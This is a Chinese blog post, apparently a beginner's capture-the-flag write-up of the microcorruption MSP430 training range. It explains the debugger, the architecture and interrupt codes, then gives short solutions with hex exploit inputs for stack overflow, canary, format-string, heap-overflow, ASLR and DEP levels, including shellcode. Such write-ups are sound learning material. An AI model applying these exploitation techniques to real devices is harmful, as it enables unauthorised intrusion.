<!DOCTYPE html>
<html lang='zh-CN'>

<head>
  <meta name="generator" content="Hexo 5.4.0">
  <meta charset="utf-8">
  

  <meta http-equiv='x-dns-prefetch-control' content='on' />
  <link rel='dns-prefetch' href='https://cdn.jsdelivr.net'>
  <link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin>

  <meta name="renderer" content="webkit">
  <meta name="force-rendering" content="webkit">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  <meta name="HandheldFriendly" content="True" >
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <title>microcorruption - 王某杂谈</title>

  
    <meta name="description" content="bin新手的iot pwn初试炼。">
<meta property="og:type" content="article">
<meta property="og:title" content="microcorruption">
<meta property="og:url" content="http://example.com/2021/07/21/microcorruption/index.html">
<meta property="og:site_name" content="王某杂谈">
<meta property="og:description" content="bin新手的iot pwn初试炼。">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2021-07-21T01:49:16.000Z">
<meta property="article:modified_time" content="2021-07-21T09:34:39.075Z">
<meta property="article:author" content="Zuni">
<meta property="article:tag" content="PWN">
<meta property="article:tag" content="靶场">
<meta name="twitter:card" content="summary">
  
  

  <!-- feed -->
  

  
    
<link rel="stylesheet" href="/css/main.css">

  

  
</head>

<body>
  


  <div class='l_body' id='start'>
    <aside class='l_left'>
    

<header class='header'>
  <div class='logo-wrap'>
  
  
    <a class='title' href='/'>
      王某杂谈
    </a>
  
</div>

  <nav class="menu dis-select"><a class="nav-item active" href="/">博客</a><a class="nav-item" href="/wiki/">wiki</a><a class="nav-item" href="/friends/">友链</a><a class="nav-item" href="/about/">关于</a></nav>
</header>

<div class='widgets'>
  
    
      
      
<div class="widget-wrap" id="toc"><div class="widget-header h4 dis-select"><span class="name">本文目录</span></div><div class="widget-body fs14 post"><div class="doc-tree active"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%BF%99%E6%98%AF%E4%B8%AA%E5%95%A5"><span class="toc-text">这是个啥</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86"><span class="toc-text">前置知识</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%B0%83%E8%AF%95%E5%91%BD%E4%BB%A4"><span class="toc-text">调试命令</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%9E%B6%E6%9E%84%E5%9F%BA%E7%A1%80"><span class="toc-text">架构基础</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%BA%94%E7%94%A8%E5%9F%BA%E7%A1%80"><span class="toc-text">应用基础</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%B1%87%E7%BC%96%E8%A7%84%E5%AE%9A"><span class="toc-text">汇编规定</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%83%A8%E5%88%86%E9%A2%98%E7%9B%AEWP"><span class="toc-text">部分题目WP</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E9%9B%B7%E5%85%8B%E9%9B%85%E6%9C%AA%E5%85%8B%EF%BC%88bss%E6%AE%B5%E6%94%BE%E7%BD%AE%E5%87%BD%E6%95%B0%EF%BC%89"><span class="toc-text">雷克雅未克（bss段放置函数）</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%80%80%E7%89%B9%E8%B1%AA%E6%96%AF-%E8%92%99%E5%BE%B7%E7%BB%B4%E5%9C%B0%E4%BA%9A%EF%BC%88%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%89"><span class="toc-text">怀特豪斯&#x2F;蒙德维地亚（栈溢出）</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E7%BA%A6%E7%BF%B0%E5%86%85%E6%96%AF%E5%A0%A1%EF%BC%88canary%EF%BC%89"><span class="toc-text">约翰内斯堡（canary）</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E4%BA%9A%E7%9A%84%E6%96%AF%E4%BA%9A%E8%BE%BE%E5%B7%B4-%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E5%88%9D%E6%AD%A5"><span class="toc-text">亚的斯亚达巴(格式化字符串漏洞初步)</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E9%98%BF%E5%B0%94%E5%8F%8A%E5%B0%94-%E5%A0%86%E6%BA%A2%E5%87%BA"><span class="toc-text">阿尔及尔(堆溢出)</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E7%AC%A6%E6%8B%89%E8%BF%AA%E6%B2%83%E6%96%AF%E6%89%98%E5%85%8B%EF%BC%88ASLR%EF%BC%89"><span class="toc-text">符拉迪沃斯托克（ASLR）</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E7%8F%AD%E5%8A%A0%E7%BD%97%E5%B0%94-DEP"><span class="toc-text">班加罗尔(DEP)</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%88%87%E5%B0%94%E8%AF%BA%E8%B4%9D%E5%88%A9%EF%BC%88%E9%AB%98%E7%BA%A7%E5%A0%86%E6%BA%A2%E5%87%BA%EF%BC%89"><span class="toc-text">切尔诺贝利（高级堆溢出）</span></a></li></ol></li></ol></li></ol></li></ol></div></div></div>

    
  
</div>


    </aside>
    <div class='l_main'>
      

      


  <div class='bread-nav fs12'>
  
    
    <div id='breadcrumb'>
      <a class='cap breadcrumb' href='/'>主页</a>
      <span class="sep"></span>
      <a class='cap breadcrumb' href='/'>文章</a>
      
    </div>
    <div id='post-meta'>
      发布于&nbsp;<time datetime='2021-07-21T01:49:16.000Z'>2021-07-21</time>
    </div>
  
  </div>


<article class='content md post'>
<h1 class="article-title"><span>microcorruption</span></h1>
<p>bin新手的iot pwn初试炼。</p>
<span id="more"></span>

<p><em>注：本文所有单体数字均为16进制</em></p>
<h2 id="这是个啥"><a href="#这是个啥" class="headerlink" title="这是个啥"></a>这是个啥</h2><p>microcorruption是一个基于msp430单片机的在线pwn靶场，其主要优势有以下几个：</p>
<ol>
<li>在网页端集成了调试台，强制锻炼命令行调试能力；</li>
<li>没有反汇编，强制锻炼读汇编码的能力；</li>
<li>16位risc架构，寄存器和栈综合传参；</li>
<li>有硬件接口，目标明确途径多样，强调文档学习能力；</li>
<li>题目考点单一，非常适合用来抠基础原理。</li>
</ol>
<h2 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h2><h4 id="调试命令"><a href="#调试命令" class="headerlink" title="调试命令"></a>调试命令</h4><p>用的命令集基本上是gdb那一套，但因为实时内存转存，没做内存显示，常用有以下</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">c(<span class="built_in">continue</span>) : 继续执行</span><br><span class="line">s(step) : 单步执行</span><br><span class="line">b [func] / b [add] (<span class="built_in">break</span>) : 下断点</span><br><span class="line">unbreak [func] / unbreak [add] :取消断点</span><br><span class="line"><span class="built_in">let</span> [add]=[value]/<span class="built_in">let</span> [register] = [value] : 设值</span><br><span class="line">f(finish)/o(out) :跳出函数</span><br><span class="line"><span class="built_in">read</span> [stadd] [len] :读取地址</span><br></pre></td></tr></table></figure>

<h4 id="架构基础"><a href="#架构基础" class="headerlink" title="架构基础"></a>架构基础</h4><ol>
<li>使用risc-v架构，十六位小端，软件寄存器传参，调用硬件中断时是栈传参。</li>
<li>主程序入口text段4400，bss段位置2400，堆区5000以上，一页100byte</li>
<li>要求2字节对齐</li>
</ol>
<h4 id="应用基础"><a href="#应用基础" class="headerlink" title="应用基础"></a>应用基础</h4><p>通过调用INT函数并传入对应参数实现硬件中断交互。</p>
<p>具体参数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">#10:打开DEP</span><br><span class="line">#11[page number][func]:设置对应页的状态为可写(1)&#x2F;可执行(0)</span><br><span class="line"></span><br><span class="line">#20:返回硬件随机数</span><br><span class="line"></span><br><span class="line">#7d[passwd][flag]:测试passwd是否正确并将结果写回flag处(H1功能)</span><br><span class="line">#7e[passwd]:测试passwd是否正确，失败直接终止程序(H2功能)</span><br><span class="line">#7f:直接开门</span><br></pre></td></tr></table></figure>

<h4 id="汇编规定"><a href="#汇编规定" class="headerlink" title="汇编规定"></a>汇编规定</h4><ol>
<li>语法风格：op source dst</li>
<li><strong>Rx</strong>寄存器，**@Rx<strong>对寄存器寻址（拓展用法：(t)<strong>Rx</strong>{asm}==Rx[t]{C}），</strong>@Rx+** 寻址后寄存器自增。</li>
<li><strong>#c</strong>是立即数，c是间接寻址，c{asm}==r0[c]{c}</li>
<li>flag: Z(零置位) ,N(负置位) ,C(溢出置位) </li>
</ol>
<h2 id="部分题目WP"><a href="#部分题目WP" class="headerlink" title="部分题目WP"></a>部分题目WP</h2><p><strong>本部分是这周做题的大致总结，具体的做题心路历程与收获会在做完最后两个题后汇总投合天</strong></p>
<h5 id="雷克雅未克（bss段放置函数）"><a href="#雷克雅未克（bss段放置函数）" class="headerlink" title="雷克雅未克（bss段放置函数）"></a>雷克雅未克（bss段放置函数）</h5><p>本题主要是在数据段内预设了函数并执行，如何读到这段程序是本题主要问题。</p>
<h6 id="方式1"><a href="#方式1" class="headerlink" title="方式1"></a>方式1</h6><p><del>单步执行读右上角的当前指令。</del></p>
<h6 id="方式2"><a href="#方式2" class="headerlink" title="方式2"></a>方式2</h6><p>跟进程序，发现调用了2400位置，运行起来之后使用read命令读取内存，发现函数大约在180长度左右，丢进反编译器，寻找cmp命令。然后将程序运行到对应位置，发现比较的位置是我们的输入，注意大小端即可解决输入问题。</p>
<p>input:9d86</p>
<p><em>注：十六进制输入用数字，字符输入用字符串</em></p>
<h5 id="怀特豪斯-蒙德维地亚（栈溢出）"><a href="#怀特豪斯-蒙德维地亚（栈溢出）" class="headerlink" title="怀特豪斯/蒙德维地亚（栈溢出）"></a>怀特豪斯/蒙德维地亚（栈溢出）</h5><p> 发现两个题没啥大区别（内 部 重 构），所以直接判断溢出长度16，找gadget，发现在4460处调用了int，栈传参，直接伪造栈帧6044 7f00 即可。</p>
<p>input:4141414141414141414141414141414160447f</p>
<h5 id="约翰内斯堡（canary）"><a href="#约翰内斯堡（canary）" class="headerlink" title="约翰内斯堡（canary）"></a>约翰内斯堡（canary）</h5><p>这里canary是固定压栈进去的，所以注意一下输入构造就好了</p>
<p>input:4141414141414141414141414141414141184644</p>
<h5 id="亚的斯亚达巴-格式化字符串漏洞初步"><a href="#亚的斯亚达巴-格式化字符串漏洞初步" class="headerlink" title="亚的斯亚达巴(格式化字符串漏洞初步)"></a>亚的斯亚达巴(格式化字符串漏洞初步)</h5><p>核心原理是%n这个控制符会将输出字符数写入下一个参数，利用这一点伪造栈帧即可。</p>
<p>input:503c2569256e</p>
<h5 id="阿尔及尔-堆溢出"><a href="#阿尔及尔-堆溢出" class="headerlink" title="阿尔及尔(堆溢出)"></a>阿尔及尔(堆溢出)</h5><p>堆的结构：bk+fd+size(vilid)+memory,开辟内存时多个块顺序开放，而free的时候需要合并，通过free函数即可发现如果覆盖下一个块的基址，块的元数据被篡改的情况下，就可以执行一次任意地址写，从而达成攻击。</p>
<p>input1:616161616161616161616161444462450100</p>
<p>input2:&lt;blank&gt;</p>
<h5 id="符拉迪沃斯托克（ASLR）"><a href="#符拉迪沃斯托克（ASLR）" class="headerlink" title="符拉迪沃斯托克（ASLR）"></a>符拉迪沃斯托克（ASLR）</h5><p>通过printf泄露printf的基址，然后再通过相对位置解决问题。</p>
<p>input1:”%x%x”</p>
<p>input2:”AAAAAAAA”+(printfadd+0x182)(小端)+”AA”+7f00</p>
<h5 id="班加罗尔-DEP"><a href="#班加罗尔-DEP" class="headerlink" title="班加罗尔(DEP)"></a>班加罗尔(DEP)</h5><p>设置栈所在的页为可写（正在尝试有没有绕过栈不可执行的方案）</p>
<p>input:324000ffb01210006161616161616161ba443f000000ee3f</p>
<p>(shellcode+8字符填充+栈执行函数（取压栈后的位置）+page number+0000+shellcode_addr)</p>
<h5 id="切尔诺贝利（高级堆溢出）"><a href="#切尔诺贝利（高级堆溢出）" class="headerlink" title="切尔诺贝利（高级堆溢出）"></a>切尔诺贝利（高级堆溢出）</h5><p>这个题卡在了对free的认知不够以及对堆块伪造的认知上，做出来再来补。</p>


<div class="article-footer fs14"><section id="license"><div class="header"><span>许可协议</span></div><div class="body"><p>本文采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">署名-非商业性使用-相同方式共享 4.0 国际</a> 许可协议，转载请注明出处。</p>
</div></section></div>

</article>

<div class="related-wrap" id="read-next"><section class="header cap theme"><span>接下来阅读</span></section><section class="body"><div class="post-title h2"><a href="/2021/07/15/%E7%8E%8B%E8%B6%85%E7%84%B6-On-the-Reliability-of-IEEE-802-1CB-FRER/">王超然-On-the-Reliability-of-IEEE-802.1CB-FRER</a></div><div class="post-title fs14"><a href="/2021/08/07/AES%E4%B8%8ESM4/">上一篇：AES与SM4</a></div></section></div>








      
<footer class="page-footer fs12"><hr><div><p>本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议，转载请注明出处。</p>
<p>本站由 <a href="http://example.com/">@Zuni</a> 创建，使用 <a target="_blank" rel="noopener" href="https://github.com/xaoxuu/hexo-theme-stellar/tree/1.1.0">Stellar</a> 作为主题。</p>
</div></footer>

      <div class='float-panel mobile-only blur' style='display:none'>
  <button type='button' class='sidebar-toggle mobile' onclick='sidebar.toggle()'>
    <svg class="icon" style="width: 1em; height: 1em;vertical-align: middle;fill: currentColor;overflow: hidden;" viewBox="0 0 1024 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="15301"><path d="M566.407 808.3c26.9-0.1 49.3-20.8 51.6-47.6-1.9-27.7-23.9-49.7-51.6-51.6h-412.6c-28.2-1.4-52.6 19.5-55.5 47.6 2.3 26.8 24.6 47.5 51.6 47.6h416.5v4z m309.3-249.9c26.9-0.1 49.3-20.8 51.6-47.6-2.2-26.8-24.6-47.5-51.6-47.6h-721.9c-27.7-2.8-52.5 17.4-55.3 45.1-0.1 0.8-0.1 1.7-0.2 2.5 0.9 27.2 23.6 48.5 50.7 47.6H875.707z m-103.1-245.9c26.9-0.1 49.3-20.8 51.6-47.6-0.4-28.3-23.2-51.1-51.5-51.6h-618.9c-29.5-1.1-54.3 21.9-55.5 51.4v0.2c1.4 27.8 25.2 49.2 53 47.8 0.8 0 1.7-0.1 2.5-0.2h618.8z" p-id="15302"></path><path d="M566.407 808.3c26.9-0.1 49.3-20.8 51.6-47.6-1.9-27.7-23.9-49.7-51.6-51.6h-412.6c-28.2-1.4-52.6 19.5-55.5 47.6 1.9 27.7 23.9 49.7 51.6 51.6h416.5z m309.3-249.9c26.9-0.1 49.3-20.8 51.6-47.6-2.2-26.8-24.6-47.5-51.6-47.6h-721.9c-27.7-2.8-52.5 17.4-55.3 45.1-0.1 0.8-0.1 1.7-0.2 2.5 0.9 27.2 23.6 48.5 50.7 47.6H875.707z m-103.1-245.9c26.9-0.1 49.3-20.8 51.6-47.6-0.4-28.3-23.2-51.1-51.5-51.6h-618.9c-29.5-1.1-54.3 21.9-55.5 51.4v0.2c1.4 27.8 25.2 49.2 53 47.8 0.8 0 1.7-0.1 2.5-0.2h618.8z" p-id="15303"></path></svg>
  </button>
</div>

    </div>
  </div>
  <div class='scripts'>
    <script type="text/javascript">
  stellar = {
    // 懒加载 css https://github.com/filamentgroup/loadCSS
    loadCSS: (href, before, media, attributes) => {
      var doc = window.document;
      var ss = doc.createElement("link");
      var ref;
      if (before) {
        ref = before;
      } else {
        var refs = (doc.body || doc.getElementsByTagName("head")[0]).childNodes;
        ref = refs[refs.length - 1];
      }
      var sheets = doc.styleSheets;
      if (attributes) {
        for (var attributeName in attributes) {
          if (attributes.hasOwnProperty(attributeName)) {
            ss.setAttribute(attributeName, attributes[attributeName]);
          }
        }
      }
      ss.rel = "stylesheet";
      ss.href = href;
      ss.media = "only x";
      function ready(cb) {
        if (doc.body) {
          return cb();
        }
        setTimeout(function () {
          ready(cb);
        });
      }
      ready(function () {
        ref.parentNode.insertBefore(ss, before ? ref : ref.nextSibling);
      });
      var onloadcssdefined = function (cb) {
        var resolvedHref = ss.href;
        var i = sheets.length;
        while (i--) {
          if (sheets[i].href === resolvedHref) {
            return cb();
          }
        }
        setTimeout(function () {
          onloadcssdefined(cb);
        });
      };
      function loadCB() {
        if (ss.addEventListener) {
          ss.removeEventListener("load", loadCB);
        }
        ss.media = media || "all";
      }
      if (ss.addEventListener) {
        ss.addEventListener("load", loadCB);
      }
      ss.onloadcssdefined = onloadcssdefined;
      onloadcssdefined(loadCB);
      return ss;
    },

    // 从 butterfly 和 volantis 获得灵感
    loadScript: (src, opt) => new Promise((resolve, reject) => {
      var script = document.createElement('script')
      script.src = src
      if (opt) {
        for (let key of Object.keys(opt)) {
          script[key] = opt[key]
        }
      } else {
        // 默认异步，如果需要同步，第二个参数传入 {} 即可
        script.async = true
      }
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    }),

    // https://github.com/jerryc127/hexo-theme-butterfly
    jQuery: (fn) => {
      if (typeof jQuery === 'undefined') {
        stellar.loadScript(stellar.plugins.jQuery).then(fn)
      } else {
        fn()
      }
    }
  };
  stellar.github = 'https://github.com/xaoxuu/hexo-theme-stellar/tree/1.1.0';
  stellar.config = {
    date_suffix: {
      just: '刚刚',
      min: '分钟前',
      hour: '小时前',
      day: '天前',
      month: '个月前',
    },
  };

  // required plugins (only load if needs)
  stellar.plugins = {
    jQuery: 'https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js',
    sitesjs: '/js/plugins/sites.js',
    friendsjs: '/js/plugins/friends.js',
  };

  // optional plugins
  if ('true' == 'true') {
    stellar.plugins.lazyload = Object.assign({"enable":true,"js":"https://cdn.jsdelivr.net/npm/vanilla-lazyload@17.3.1/dist/lazyload.min.js","transition":"blur"});
  }
  if ('true' == 'true') {
    stellar.plugins.swiper = Object.assign({"enable":true,"css":"https://unpkg.com/swiper/swiper-bundle.min.css","js":"https://unpkg.com/swiper/swiper-bundle.min.js"});
  }
  if ('' == 'true') {
    stellar.plugins.scrollreveal = Object.assign({"enable":null,"js":"https://cdn.jsdelivr.net/npm/scrollreveal@4.0.9/dist/scrollreveal.min.js","distance":"8px","duration":500,"interval":100,"scale":1});
  }
  if ('true' == 'true') {
    stellar.plugins.preload = Object.assign({"enable":true,"service":"flying_pages","instant_page":"https://cdn.jsdelivr.net/gh/volantis-x/cdn-volantis@4.1.2/js/instant_page.js","flying_pages":"https://cdn.jsdelivr.net/gh/gijo-varghese/flying-pages@2.1.2/flying-pages.min.js"});
  }
</script>

<!-- required -->

  
<script src="/js/main.js" async></script>



<!-- optional -->



<!-- inject -->


  </div>
</body>
</html>
